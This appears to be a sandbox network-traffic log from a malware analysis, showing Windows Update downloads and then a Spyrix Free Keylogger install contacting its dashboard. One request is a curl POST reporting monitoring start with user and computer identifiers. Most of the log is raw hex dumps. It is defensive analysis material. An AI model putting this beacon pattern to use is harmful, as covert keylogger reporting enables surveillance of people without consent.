2024-10-02 04:25:40 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ea de ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 Data Ascii: dddddddddddddddddddddddddddddddd
2024-10-02 04:25:40 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 Data Ascii: dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:42 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 04:25:42 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 2c5472a4-10a6-49b1-9c32-2269ddad134c MS-RequestId: f24b84d4-4c3b-4b66-8f47-5d612b1dcb21 MS-CV: Q5zdSFzXQEKT/sSB.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 04:25:41 GMT Connection: close Content-Length: 24490
2024-10-02 04:25:42 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-02 04:25:42 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:26:26 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 04:26:27 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: bf54724d-71ed-4056-b6b3-bd2228e46852 MS-RequestId: f3c07320-d874-48c0-813d-09db5e91a682 MS-CV: /ehD+UkpgUKBx8ke.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 04:26:26 GMT Connection: close Content-Length: 30005
2024-10-02 04:26:27 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-02 04:26:27 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:28:22 UTC	663	OUT	GET / HTTP/1.1 Host: dashboard.spyrix.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:28:22 UTC	248	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:28:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; X-State: 3.0
2024-10-02 04:28:22 UTC	650	IN	Data Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 Data Ascii: 27e<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <link rel="icon" href="/favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="robots" content="noinde

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:28:22 UTC	166	OUT	POST /dashboard/prg-actions HTTP/1.1 Host: spyrix.net User-Agent: curl/7.64.0 Accept: / Content-Length: 429 Content-Type: application/x-www-form-urlencoded
2024-10-02 04:28:22 UTC	429	OUT	Data Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 4d 6f 6e 69 74 6f 72 69 6e 67 3a 53 74 61 72 74 42 75 74 74 6f 6e 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 33 37 2e 38 30 30 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f Data Ascii: &action=app:Monitoring:StartButton&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:37.800&prg_lng=english&os_caption= ()&os_
2024-10-02 04:28:23 UTC	170	IN	HTTP/1.1 201 Created Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:28:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 04:28:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:28:23 UTC	574	OUT	GET /dashboard30/assets/index-93c74fef.css HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:28:23 UTC	314	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:28:23 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-ef8c" Content-Encoding: gzip Cache: STALE X-Cached-Since: 2024-10-02T03:24:12+00:00 X-Node: m9-up-gc28
2024-10-02 04:28:23 UTC	3782	IN	Data Raw: 33 39 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 7b 73 23 b9 91 e7 ff f7 29 b8 d3 e1 08 c9 a7 62 f3 fd 52 ec 86 e7 e1 59 af 6f ed f5 7b 6f ec 98 53 14 ab 8a 22 2d 8a d4 90 54 4b 3d 3a dd 67 bf 5f 26 32 f1 28 a0 48 aa a7 1d 77 17 71 d3 ee b6 54 85 4a 24 f2 8d 44 02 f8 45 b1 cc 77 fb ea d0 fa e2 cf 7f fa 36 9b 7c 71 fd 8b c5 76 73 c8 16 79 51 bd c8 4f f7 ab f5 c7 d9 6f 1f 37 ab c3 f6 7a bf 2b 66 8f bb f5 c5 f2 70 78 d8 cf de bf 2f ca 4d 1b 7f cb ed d3 66 bd cd cb f6 a6 3a bc 2f f3 fd 72 be cd 77 65 bf f3 3e df 03 f6 fe bd f9 3a fb 43 75 fb b8 ce 77 d9 b8 5f 16 79 3e ec b6 9f b6 8b 45 ef 92 a1 ae b7 45 be be f8 e2 77 db 87 87 d5 66 ff c5 e5 d5 67 ef a6 b5 d8 ee ee f3 c3 c5 17 d4 eb 17 97 d7 3c bc a7 6a 75 bb 3c cc fa 9d 4e 6b d8 e9 98 67 fb c3 c7 75 35 Data Ascii: 39b9}{s#)bRYo{oS"-TK=:g_&2(HwqTJ$DEw6\|qvsyQOo7z+fpx/Mf:/rwe>:Cuw_y>EEwfg<ju<Nkgu5
2024-10-02 04:28:23 UTC	4096	IN	Data Raw: 71 4f f3 2c fb bd c1 c8 36 c0 06 0f c4 3b 2b d4 7a 97 b2 dc 64 68 a9 f3 cd 4b 2d d5 62 24 d8 25 6a d9 5a 7b f0 9a bf 98 95 23 f3 8d a4 33 2e af d9 5a 97 48 45 23 25 4f 7b 9c b0 87 09 09 7f 14 c4 b5 68 75 8f 23 b2 2e f6 f8 4c a7 d8 e9 d3 c7 56 1f bf c8 b1 dd df bf e6 a6 32 3a 05 dc 4c 98 a2 2e 64 51 fc 5d de 9b ce 17 d5 eb b2 7b b5 ec 5d 2d fb 57 cb c1 d5 72 f8 82 75 ac 5b 84 d2 d8 fd 20 6b 66 1d b4 60 fe cd 3c c9 59 22 b4 f4 19 e4 bd f2 e2 0b 5d 95 ab 91 e9 75 d9 8b 01 22 d8 fc 64 80 ae 92 ce 96 25 ba 62 44 66 86 56 06 4a d9 ea eb b2 1f 63 80 29 ce 27 63 f0 ba 1c c4 00 31 21 3a 0e 50 63 ad 26 3a 99 50 ff 45 f2 85 54 74 e8 ed 24 33 a5 cb c5 e3 6e 8f 95 1c 29 0e 76 4c 43 35 a6 f0 11 8b ae 24 4e a6 d6 97 33 e0 02 90 e4 60 9d 3f 60 69 44 7f 90 95 53 69 5a 5e Data Ascii: qO,6;+zdhK-b$%jZ{#3.ZHE#%O{hu#.LV2:L.dQ]{]-Wru[ kf`<Y"]u"d%bDfVJc)'c1!:Pc&:PETt$3n)vLC5$N3`?`iDSiZ^
2024-10-02 04:28:23 UTC	4096	IN	Data Raw: 27 a8 f8 21 15 42 3b 6c 79 3d 4f bf 00 b3 ce 91 84 ed b3 69 0b 44 fa 7c 22 91 65 53 43 5f 0d 03 34 35 60 be 7e 28 25 15 e0 4c f3 4c 6d 79 d3 34 0c c6 32 c2 3d a0 49 df 89 d3 69 b0 69 8c 3d fe 7e 7a 5f ed 5a 82 cb 89 9f 07 3e 14 1f ef c2 54 be 28 d5 dc 9f 5a 7d 65 ce f0 55 00 72 6f a6 bd 46 b5 95 13 e3 37 a8 1e 8c b9 1a 50 86 4e 10 d6 64 97 24 d7 62 06 34 7b a7 17 9f 83 6a df 9d ff 21 e8 0d d6 da f3 ba dc ea 0c d9 8b 11 7b 63 84 3f ef d7 c2 22 2f e8 3b 17 78 5a 3a 22 91 90 00 77 80 b2 57 ba 6d d7 06 62 a7 7b 6c 96 91 a6 4e 8e 8a c8 bf 52 f5 47 76 86 9c 34 e2 79 5a 3e cc 3c a6 49 b6 3f 3f c5 da ab 4d b8 98 a7 c3 fb de 2e 9c b4 c7 8a 36 a7 cb 13 77 d2 d1 2a 0d 4e 88 c8 1b cd e3 bb 45 51 74 c7 28 a1 72 37 ef 06 ca 17 52 f6 a5 f3 b3 26 b3 6d 8f 3d bc 7c c5 46 Data Ascii: '!B;ly=OiD\|"eSC_45`~(%LLmy42=Iii=~z_Z>T(Z}eUroF7PNd$b4{j!{c?"/;xZ:"wWmb{lNRGv4yZ><I??M.6w*NEQt(r7R&m=\|F
2024-10-02 04:28:23 UTC	2811	IN	Data Raw: 52 64 24 61 1c cd 1e 2b 75 94 6b 4c ea 9e 1a d2 71 9f 18 8c e7 df 69 b9 35 48 01 99 8c b0 57 c9 40 6a 32 eb b6 ba a4 f6 d6 64 20 ae 20 d0 94 d0 3d 2c b3 60 c7 a2 1b 5e a0 6d be a9 56 a3 a2 fb 5a 94 78 67 00 ad 95 99 e6 87 c3 ee 82 73 8d 07 5c 08 bc 4e 69 54 4c 55 93 bb e6 62 0c 92 b9 ac cb f5 8f 56 b4 6a b3 1e 9d 01 b8 1c ac 9a 19 0a 48 89 6f b1 f5 f3 93 4a 1e b1 79 66 41 d9 43 8f bc 9c 1b e0 d9 1e 57 f7 d9 4d 60 4a 0b be 0d a3 44 ba 68 f3 18 49 a5 10 43 e9 6c ea 80 49 05 68 6b 9d 9b 1b 2f a6 9d c9 b4 37 3c 23 5d e2 6c a9 31 63 0d 70 ec c9 49 d2 de d3 0a 13 30 ba 6b f0 1c 36 ad 36 2e ce 33 d7 07 1c 40 6b 1d 8c 43 8e 5d b0 49 06 b0 1a c3 74 5c aa a9 ab f5 e0 63 57 cb 26 39 78 4a 16 0e cf 12 e2 17 ae e3 9d 03 d2 18 91 2b b6 b9 86 34 d2 79 3b b4 82 0e 07 67 Data Ascii: Rd$a+ukLqi5HW@j2d =,`^mVZxgs\NiTLUbVjHoJyfACWM`JDhIClIhk/7<#]l1cpI0k66.3@kC]It\cW&9xJ+4y;g
2024-10-02 04:28:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:28:23 UTC	594	OUT	GET /dashboard30/assets/index-004f4025.js HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://dashboard.spyrix.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:28:23 UTC	405	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:28:23 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-135fd2" Content-Encoding: gzip Access-Control-Allow-Origin: https://dashboard.spyrix.com Cache: STALE X-Cached-Since: 2024-10-01T20:39:52+00:00 X-Node: m9-up-gc229
2024-10-02 04:28:23 UTC	3691	IN	Data Raw: 35 36 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c4 bd 0d 73 db 46 96 f7 fb 55 24 96 56 4b 8e 61 c5 ca cc ce ce 80 86 59 8c 2c c7 9a d8 4e 1c db 8a 12 45 cb 50 24 24 d1 a6 08 86 20 25 33 92 9e cf 7e 7f ff d3 2f 00 29 79 36 cf ad ba 75 ab 6c 11 68 34 fa e5 f4 e9 f3 de 07 57 fd d9 c6 de 41 f6 fd e9 c7 7c 30 df 19 e6 67 a3 49 fe c3 ac 98 e6 b3 f9 b2 7d c5 c3 83 83 ac 99 27 dd 64 de ca 9e 75 37 46 93 8d bc b3 77 60 25 37 f9 64 71 99 cf fa a7 e3 3c dd 7c 92 0c 8a c9 d9 e8 7c 11 ef af 67 a3 79 78 76 d5 1f 2f f2 74 7e d7 4a f3 e3 ee 49 36 b7 96 7f 9c 54 2d 37 0f d4 e6 7c 39 cd 8b b3 8d ee 66 d6 28 97 97 a7 c5 b8 d1 e9 3e 6a 34 52 f5 ce bf 76 f3 6c 31 19 cc 47 c5 a4 d9 ba a1 bb 72 be d1 cd 86 c5 80 51 4c e6 3b 83 59 de 9f e7 fb e3 5c 77 cd c6 78 34 f9 d4 68 ed cc Data Ascii: 565fsFU$VKaY,NEP$$ %3~/)y6ulh4WA\|0gI}'du7Fw`%7dq<\|\|gyxv/t~JI6T-7\|9f(>j4Rvl1GrQL;Y\wx4h
2024-10-02 04:28:23 UTC	4096	IN	Data Raw: f8 42 dc 19 97 b3 5c 57 c1 67 2a 95 2c 70 a6 ef a7 d2 7b cb f8 4c ba cd 66 50 6a fc bb 48 f1 e5 45 b1 18 0f 7f 64 59 f3 19 43 1a 8e 70 b4 4b bf 2a b1 46 dd e9 1d cf d9 77 2e 64 af 8d ae 99 66 63 58 5c a6 8e f0 b8 97 1b 70 96 04 cf 46 bd c1 e0 8c 74 23 c5 10 1e 1a f3 83 7c 4f 3f 92 6a c4 9a 86 d8 c7 6d 41 86 c9 68 98 e6 e3 6a 33 0f b5 42 ad 0e 8a ea b0 95 da 4d 52 ef c4 5c c2 ad b6 b6 e2 0c ec e9 31 30 9b eb 0c bd 27 bb c9 c7 af fb d3 f4 26 1a 0b 52 a2 0a bc 8b de fb e6 93 68 54 e0 99 ae ef 60 55 d1 d3 3e 94 17 cd a4 63 e8 d0 45 8e 3b fe 24 08 33 67 59 73 91 41 ae 4d a7 72 64 04 e1 7f 08 ff 5f 29 5a c0 59 f0 9a 23 aa d7 9a 9d 7a e7 dc d9 49 e0 d3 3d 64 c4 da a4 7b 0f a3 25 2e c6 d9 8e cd e9 78 ba 8a 62 4e 78 ba 40 35 85 9a 00 2b 07 6a 10 7e da 6a 9d 64 53 Data Ascii: B\Wg,p{LfPjHEdYCpKFw.dfcX\pFt#\|O?jmAhj3BMR\10'&RhT`U>cE;$3gYsAMrd_)ZY#zI=d{%.xbNx@5+j~jdS
2024-10-02 04:28:23 UTC	4096	IN	Data Raw: d8 de 20 2a 4c d9 e9 91 a3 9b 2b 53 3a cd 17 96 c2 4f 1c 4e 22 1d aa cc 98 ff a4 d5 b9 e0 18 43 2b a5 45 fc 67 b4 58 d6 44 07 b3 7e 96 2d 97 d2 82 d3 3b 21 f2 bc 6b 6a 9f fa 37 10 7a 0b 33 e1 af 94 18 09 8a 25 c1 74 df 03 99 db cd ce e6 f1 ff 34 4f fe f2 6b 4b f8 7c 4e 51 da 3c fe 9f 93 47 ad af 92 a9 90 fd ab 5f ff c2 ed 5f 3a bf fe e5 d7 af be 3a af 66 cb 08 57 dd b5 9e ad 55 9b 69 ca 46 60 17 38 fe d8 5b 56 9e 0c 19 e2 18 54 ed b4 0f 71 fa 76 30 e1 7c 49 74 be b7 de 3f 83 c5 c8 5f 01 81 f2 f1 9e 27 d9 e4 78 37 dc 20 2d 22 93 56 ec fa 47 01 fd 46 40 ee 12 d0 af 49 3b 30 40 a5 5d 74 11 25 6e 61 fe cc 62 a8 35 d6 83 d1 68 10 8f b2 c9 23 9d 99 88 8a b5 83 a7 1a f2 d2 81 2c d2 b9 6d 2b 57 7f 6e f5 03 e2 62 bf b0 03 16 d5 68 2f 0d 7a 0c 69 33 0f cb 22 89 42 Data Ascii: *L+S:ON"C+EgXD~-;!kj7z3%t4OkK\|NQ<G__::fWUiF`8[VTqv0\|It?_'x7 -"VGF@I;0@]t%nab5h#,m+Wnbh/zi3"B
2024-10-02 04:28:23 UTC	4096	IN	Data Raw: d5 dd b0 71 de de 5a 67 55 df c8 3b 34 e7 e0 83 f4 15 c6 29 85 c8 63 60 b7 43 1d e4 ce 9a 6d e9 97 fa 94 af 19 10 1f 46 41 4c 11 ee 35 44 64 b0 43 b9 16 f7 2c 56 d5 96 b3 63 68 c6 09 8b 2d 53 db 5c 99 a1 48 5a 4b c7 98 f7 34 1c e7 d3 40 75 8f 32 34 13 91 e3 40 f2 a9 7e 9d ab a2 8e c4 5d 5e 14 a5 5a 55 0f 24 42 52 5d d1 42 58 90 c9 33 12 b7 0e 16 89 2f 80 11 1a c4 ca 8b 54 c6 ca 7f 54 75 37 ce 18 8a 31 a1 f8 74 50 c7 73 f7 b8 fe b2 95 54 82 88 75 0c e9 13 aa fd 22 3c 93 a1 d7 a2 2e 7e 59 ba 75 08 51 17 12 10 25 5a f8 a8 12 bf bc c1 d1 26 28 38 1b 82 f3 79 05 a2 7b 16 fd 93 52 fc 0e c5 60 10 f2 ba a9 2d a2 af 6a 6c c7 4a f7 14 a6 64 c1 14 56 56 89 35 2c 84 89 35 f5 37 ee 40 ff 0d 57 af c6 13 ee 0f f1 f6 16 24 ed a2 76 81 6b e8 50 dd 5a ff a6 d5 b8 37 c2 e8 Data Ascii: qZgU;4)c`CmFAL5DdC,Vch-S\HZK4@u24@~]^ZU$BR]BX3/TTu71tPsTu"<.~YuQ%Z&(8y{R`-jlJdVV5,57@W$vkPZ7
